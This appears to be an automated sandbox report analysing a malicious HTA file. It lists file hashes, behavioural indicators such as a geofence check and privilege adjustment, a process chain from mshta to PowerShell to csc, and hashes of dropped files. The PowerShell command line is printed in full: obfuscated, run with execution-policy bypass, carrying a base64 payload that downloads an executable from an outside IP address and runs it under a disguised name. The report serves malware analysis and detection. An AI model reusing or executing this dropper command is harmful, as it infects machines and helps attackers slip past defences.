Analysis
max time kernel: 98s
max time network: 100s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240611-en locale:en-us os:windows10-2004-x64 system
submitted: 13-06-2024 17:28
Static task: static1
Behavioral task: behavioral1
  Sample: 3371aa45b44d7065089695960d94e028.hta
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 3371aa45b44d7065089695960d94e028.hta
  Resource: win10v2004-20240611-en
General
Target: 3371aa45b44d7065089695960d94e028.hta
Size: 34KB
MD5: 3371aa45b44d7065089695960d94e028
SHA1: 77f7d123f864ba762b813efa8e1d4c6abfaceee4
SHA256: 28499696b10d24ae8686b10f6afce67f6357d11490dd4a76a7e4a671a16d4ea6
SHA512: 24c547b7e6bd197b5d829166341e9483657571bad5023baf0d02eb87c158cdcd2a58bae8d8d1db33db5f6faa582a325c05f09ca284ea5ee8441e114fff149aae
SSDEEP: 96:40xsXYxvOsXvQ645fUfr8jmaTWJrwvQ0aDG/ratntYe1a0aOsXEtONQ:403hfP45f65sQ7DG/ratNM7gONQ
Malware Config
Signatures
Blocklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow 14, pid 2232, process powershell.exe
Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: mshta.exe
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation; process: mshta.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe
  pid 2232, process powershell.exe (2 hits)
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
  description: Token: SeDebugPrivilege; pid 2232; process powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: mshta.exe, cmd.exe, powershell.exe, csc.exe
  PID 656 (mshta.exe) wrote to memory of 1316 (cmd.exe), 3 hits
  PID 1316 (cmd.exe) wrote to memory of 2232 (powershell.exe), 3 hits
  PID 2232 (powershell.exe) wrote to memory of 4460 (csc.exe), 3 hits
  PID 4460 (csc.exe) wrote to memory of 3928 (cvtres.exe), 3 hits
Processes
1. C:\Windows\SysWOW64\mshta.exe (PID 656)
   Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3371aa45b44d7065089695960d94e028.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
  2. C:\Windows\SysWOW64\cmd.exe (PID 1316)
     Command line: "C:\Windows\system32\cmd.exe" "/c POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'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'+[chaR]34+'))')))"
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2232)
       Command line: POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory
      4. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 4460)
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zi5zlzvz\zi5zlzvz.cmdline"
         - Suspicious use of WriteProcessMemory
        5. C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 3928)
           Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5A4.tmp" "c:\Users\Admin\AppData\Local\Temp\zi5zlzvz\CSC1316B25F802F407BA87462B92B31869.TMP"
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: c7d831fd91720b12824ffe4b3726494d
  SHA1: c7836409554e8f951577d9f6956c1d2f666582aa
  SHA256: c27a6c789f111196b6c0eb3746288cb2273faca9c1bf5ef644e110e24ce113b5
  SHA512: 8050a4bffd40221daa4374335fd30c198716419789991ae3774defab5b5bf6ff9eb514557452a4c337e6cf7811e90cb7c734066ab477a0ac89bbe31db6409c52
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 3KB
  MD5: 75e9cab93cc07af3837b935e3cbb8a0f
  SHA1: 75e4ddc1f76371dcc29236993323d81f9d82a7b6
  SHA256: ee87eafe00c88b35258c28375d8e953577fa137dc7da3e8476e50134988a785e
  SHA512: 48cced328308a645fb867fc31a6149b4b16aaa2c34db18ddff6213cf62131dddd5d352eefc7eafe15c81a2cda002d6ebdad051fd629debf679fa1d09997219f4
- Filesize: 652B
  MD5: 4630761f2863f496dd246f006083f047
  SHA1: ef6e789ebaab1cafd24d41e49a00ef70c15deb0c
  SHA256: 784eaecd9c7980d27cc580b8495de46979cb86b8d9728b721ae06383eb2bc087
  SHA512: 2f599a10c9bd260f11c78a73387c65898abe1afdad54b478e5f5be31137788582c434580585267dab02c513ec1199fdc0b87f849804f075e6415645da2bc256c
- Filesize: 456B
  MD5: b482306a1ee20f92189f3cbcd699aba3
  SHA1: 42d499137c52fa5bed274ae4942b089dbf025119
  SHA256: ca429dae59619b584c51f3eb7f070e425308c373ebe32222679ead6b9ca4f706
  SHA512: 47f9add1109662cd59843fed68a72edbbc13da41fd1757f8fbd5ea46aa70eb43b87865d903505a50b1b2419b41eb40878cce4eeb9ce6c2587a4e028e93e527c5
- Filesize: 369B
  MD5: 558dd96f4c38752068835a99c9ba819e
  SHA1: 4d207c44bfe421a592694b2a0bb4fcf6ae25b00b
  SHA256: 6a57846819e1d16973eb43120ecaeaa62bdd76ffb1bae5f3a7db923607aad59a
  SHA512: 50a3f5aab23042216be3db5d7e19dcb88243cdaf1a4524d953c7ce8957a2530ce8d2110a12a73c2d4c5b2b82e62641cff0cb2f4f3dbd268bebe65ec09e234b4f